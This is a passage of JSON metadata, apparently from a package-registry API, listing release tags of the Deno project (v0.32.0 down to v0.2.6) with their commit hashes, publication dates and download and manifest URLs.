","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.m